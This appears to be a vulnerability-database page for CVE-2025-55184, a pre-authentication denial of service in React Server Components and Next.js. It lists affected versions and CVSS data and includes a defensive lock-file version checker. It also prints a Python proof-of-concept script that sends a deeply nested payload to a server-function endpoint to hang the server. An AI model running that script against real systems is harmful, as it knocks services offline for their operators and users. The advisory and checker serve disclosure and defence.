Security Vulnerability Report
CVE-2025-55184 CVSS 7.5 HIGH

CVE-2025-55184

Published: 2025-12-11 20:16:01
Last Modified: 2025-12-15 17:15:53

Description

A pre-authentication denial of service vulnerability exists in React Server Components versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints, which can cause an infinite loop that hangs the server process and may prevent future HTTP requests from being served.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:facebook:react:*:*:*:*:*:*:*:* (19.0.0 <= version < 19.0.2) - VULNERABLE
cpe:2.3:a:facebook:react:*:*:*:*:*:*:*:* (19.1.0 <= version < 19.1.3) - VULNERABLE
cpe:2.3:a:facebook:react:*:*:*:*:*:*:*:* (19.2.0 <= version < 19.2.2) - VULNERABLE
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* (13.3.0 <= version < 14.2.35) - VULNERABLE
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* (15.0.0 <= version < 15.0.7) - VULNERABLE
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* (15.1.0 <= version < 15.1.11) - VULNERABLE
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* (15.2.0 <= version < 15.2.8) - VULNERABLE
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* (15.3.0 <= version < 15.3.8) - VULNERABLE
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* (15.4.0 <= version < 15.4.10) - VULNERABLE
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* (15.5.0 <= version < 15.5.9) - VULNERABLE
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* (16.0.0 <= version < 16.0.10) - VULNERABLE
cpe:2.3:a:vercel:next.js:15.6.0:-:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:vercel:next.js:15.6.0 canary builds (canary0, canary1, canary10 and further individual entries; the raw JSON below is truncated) - VULNERABLE
react-server-dom-parcel < 19.2.2
react-server-dom-turbopack < 19.2.2
react-server-dom-webpack < 19.2.2
React Server Components 19.0.0
React Server Components 19.0.1
React Server Components 19.1.0
React Server Components 19.1.1
React Server Components 19.1.2
React Server Components 19.2.0
React Server Components 19.2.1
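A defender's first question for a record like this is which deployed packages actually sit inside the affected ranges. The script below is an added example, not part of the NVD record or the PoC on this page: it encodes the versionStartIncluding / versionEndExcluding pairs from the record's CPE match data and scans a package-lock.json for affected entries. Assumptions: the react-server-dom-parcel/-turbopack/-webpack packages are checked against the same ranges as react (they are released in lock-step, and the record's version list is identical for them); next.js 15.6.0 and any of its canary builds are flagged as a whole, because the record lists those builds individually and the list is truncated on this page; the sample lock file is constructed for illustration.

```python
"""Check installed package versions against the affected ranges of CVE-2025-55184.

Added example (not the NVD record's or the PoC's code). Ranges are copied from the
record's cpeMatch entries; the lock-file sample below is constructed.
"""
import json
import re

CVE_ID = "CVE-2025-55184"

# (versionStartIncluding, versionEndExcluding) pairs from the record's cpeMatch data.
REACT_RANGES = [("19.0.0", "19.0.2"), ("19.1.0", "19.1.3"), ("19.2.0", "19.2.2")]
NEXTJS_RANGES = [
    ("13.3.0", "14.2.35"), ("15.0.0", "15.0.7"), ("15.1.0", "15.1.11"),
    ("15.2.0", "15.2.8"), ("15.3.0", "15.3.8"), ("15.4.0", "15.4.10"),
    ("15.5.0", "15.5.9"), ("16.0.0", "16.0.10"),
]

# npm package name -> ranges. Assumption: the react-server-dom-* packages follow
# react's ranges (they are versioned in lock-step and the record lists the same versions).
AFFECTED = {
    "react": REACT_RANGES,
    "react-server-dom-parcel": REACT_RANGES,
    "react-server-dom-turbopack": REACT_RANGES,
    "react-server-dom-webpack": REACT_RANGES,
    "next": NEXTJS_RANGES,
}

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?")


def parse_version(text):
    """Return ((major, minor, patch), prerelease_or_None).

    A leading 'v' and range operators (^ ~ = < >) are stripped, so a package.json
    specifier can be checked too; only the lower bound it names is then compared.
    """
    match = _VERSION_RE.match(text.strip().lstrip("^~=<>"))
    if not match:
        raise ValueError(f"unparseable version: {text!r}")
    core = tuple(int(part) for part in match.group(1, 2, 3))
    return core, match.group(4)


def is_affected(package, version):
    """True when `version` of `package` lies inside a recorded vulnerable range."""
    ranges = AFFECTED.get(package)
    if ranges is None:
        return False
    core, _prerelease = parse_version(version)
    # The record lists next.js 15.6.0 itself and its canary builds as separate
    # entries (the list is truncated on the page), so flag all of 15.6.0 conservatively.
    if package == "next" and core == (15, 6, 0):
        return True
    for start, end in ranges:
        if parse_version(start)[0] <= core < parse_version(end)[0]:
            return True
    return False


def scan_lockfile(lock_json):
    """Scan a package-lock.json (lockfileVersion 2/3 'packages' map); return sorted (name, version) hits."""
    findings = set()
    packages = json.loads(lock_json).get("packages", {})
    for path, meta in packages.items():
        # Keys look like "node_modules/react" or "node_modules/a/node_modules/@scope/b".
        name = path.rsplit("node_modules/", 1)[-1] if path else None
        version = meta.get("version")
        if name and version and is_affected(name, version):
            findings.add((name, version))
    return sorted(findings)


# Constructed sample lock file; not taken from any real project.
SAMPLE_LOCK = json.dumps({
    "name": "sample-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "sample-app", "version": "1.0.0"},
        "node_modules/react": {"version": "19.2.1"},
        "node_modules/react-server-dom-webpack": {"version": "19.2.2"},
        "node_modules/next": {"version": "15.5.3"},
        "node_modules/@scope/other": {"version": "15.5.3"},
    },
})

if __name__ == "__main__":
    for name, version in scan_lockfile(SAMPLE_LOCK):
        print(f"{CVE_ID}: {name}@{version} is inside an affected range")
```

Run it against a real lock file by replacing SAMPLE_LOCK with the file's contents. A patched react-server-dom-webpack 19.2.2 is not reported, while react 19.2.1 and next 15.5.3 are; the comparison is exclusive at the upper bound, matching versionEndExcluding in the record.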

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-55184 PoC - React Server Components DoS

This PoC demonstrates sending a malicious payload to trigger infinite loop
in React Server Components' unsafe deserialization.
"""
import requests
import json
import sys
from urllib.parse import urljoin


def create_malicious_payload():
    """
    Create a malicious payload designed to trigger infinite loop during
    deserialization in React Server Components.
    The payload contains circular references that cause infinite recursion.
    """
    # Create a payload with circular reference structure
    payload = {
        "__typename": "ServerFunction",
        "data": {
            "__proto": {
                "nested": {
                    "__proto": {
                        "recursive": {
                            "__proto": {}
                        }
                    }
                }
            }
        },
        "chunks": [],
        "format": "raw"
    }

    # Add deeply nested structure to trigger stack overflow
    current = payload
    for i in range(1000):
        current["nested"] = {"value": i, "next": {}}
        current = current["next"]

    return payload


def exploit(target_url, endpoint="/api/server-function"):
    """
    Send malicious request to target Server Function endpoint.
    """
    full_url = urljoin(target_url, endpoint)
    headers = {
        "Content-Type": "text/plain",
        "Accept": "application/json",
        "X-React-Server-Components": "1.0"
    }
    payload = create_malicious_payload()

    print(f"[*] Sending malicious payload to: {full_url}")
    print(f"[*] Payload size: {len(json.dumps(payload))} bytes")

    try:
        response = requests.post(
            full_url,
            data=json.dumps(payload),
            headers=headers,
            timeout=10
        )
        print(f"[!] Response received: {response.status_code}")
    except requests.exceptions.Timeout:
        print("[!] Request timed out - server may be hanging!")
    except requests.exceptions.ConnectionError:
        print("[!] Connection failed - server may be down!")
    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url> [endpoint]")
        print(f"Example: python {sys.argv[0]} http://vulnerable-app.com /api/action")
        sys.exit(1)

    target = sys.argv[1]
    endpoint = sys.argv[2] if len(sys.argv) > 2 else "/api/server-function"
    exploit(target, endpoint)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55184", "sourceIdentifier": "[email protected]", "published": "2025-12-11T20:16:00.610", "lastModified": "2025-12-15T17:15:53.073", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A pre-authentication denial of service vulnerability exists in React Server Components versions 19.0.0, 19.0.1 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints, which can cause an infinite loop that hangs the server process and may prevent future HTTP requests from being served."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:facebook:react:*:*:*:*:*:*:*:*", "versionStartIncluding": "19.0.0", "versionEndExcluding": "19.0.2", "matchCriteriaId": "4B63E074-FEA2-495B-98C6-9D74E343A1C0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:facebook:react:*:*:*:*:*:*:*:*", "versionStartIncluding": "19.1.0", "versionEndExcluding": "19.1.3", "matchCriteriaId": "4C133EED-6729-453F-B832-3E5A7EC22E92"}, {"vulnerable": true, "criteria": "cpe:2.3:a:facebook:react:*:*:*:*:*:*:*:*", "versionStartIncluding": "19.2.0", "versionEndExcluding": "19.2.2", 
"matchCriteriaId": "DE6F153C-825C-41B6-BE6F-2552A26307E0"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "13.3.0", "versionEndExcluding": "14.2.35", "matchCriteriaId": "6E0DE913-817F-40D2-BC98-0D610CCDE02A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "15.0.0", "versionEndExcluding": "15.0.7", "matchCriteriaId": "7F89ACED-432F-4789-A368-96D4E28DEE34"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.11", "matchCriteriaId": "99287D38-84D1-470A-96EF-B1D851552139"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "15.2.0", "versionEndExcluding": "15.2.8", "matchCriteriaId": "4E4E7989-19E3-44C5-B292-54C73FF3F356"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "15.3.0", "versionEndExcluding": "15.3.8", "matchCriteriaId": "78D397D2-B678-4463-85AB-8887554166C9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "15.4.0", "versionEndExcluding": "15.4.10", "matchCriteriaId": "137455D1-FCE0-4A58-A479-E7CA39EA969D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "15.5.0", "versionEndExcluding": "15.5.9", "matchCriteriaId": "7EFB67E0-24A1-4013-A654-C3EEAA2702DD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "16.0.0", "versionEndExcluding": "16.0.10", "matchCriteriaId": "009539CB-1F6D-446A-B581-1ABC70B10154"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:15.6.0:-:*:*:*:node.js:*:*", "matchCriteriaId": "3ED7F693-8012-4F88-BC71-CF108E20664A"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:vercel:next.js:15.6.0:canary0:*:*:*:node.js:*:*", "matchCriteriaId": "40EE98AC-754A-4FD9-B51A-9E2674584FD9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:15.6.0:canary1:*:*:*:node.js:*:*", "matchCriteriaId": "13B41C54-AF21-4637-A852-F997635B4E83"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:15.6.0:canary10:*:*:*:node.js:*:*", "matchCriteriaId": "91B41697-2D70-488D-A5C3-CB9D435560CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:15.6.0:canary11:*:*:*:node.js:*:*", "matchCriteriaId": "7D43DB84-7BCF-429B-849A-7189EC1922D0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:15.6.0:canary12:*:*:*:node.js:*:*", "matchCriteriaId": "CEC2346B-8DBD-4D53-9866-CFBDD3AACEF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:15.6.0:canary13:*:*:*:node.js:*:*", "matchCriteriaId": "2BC95097-8CA6-42FE-98D7-F968E37C11B7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:15.6.0:canary14:*:*:*:node.js:*:*", "matchCriteriaId": "4F8FA85C-1200- ... (truncated)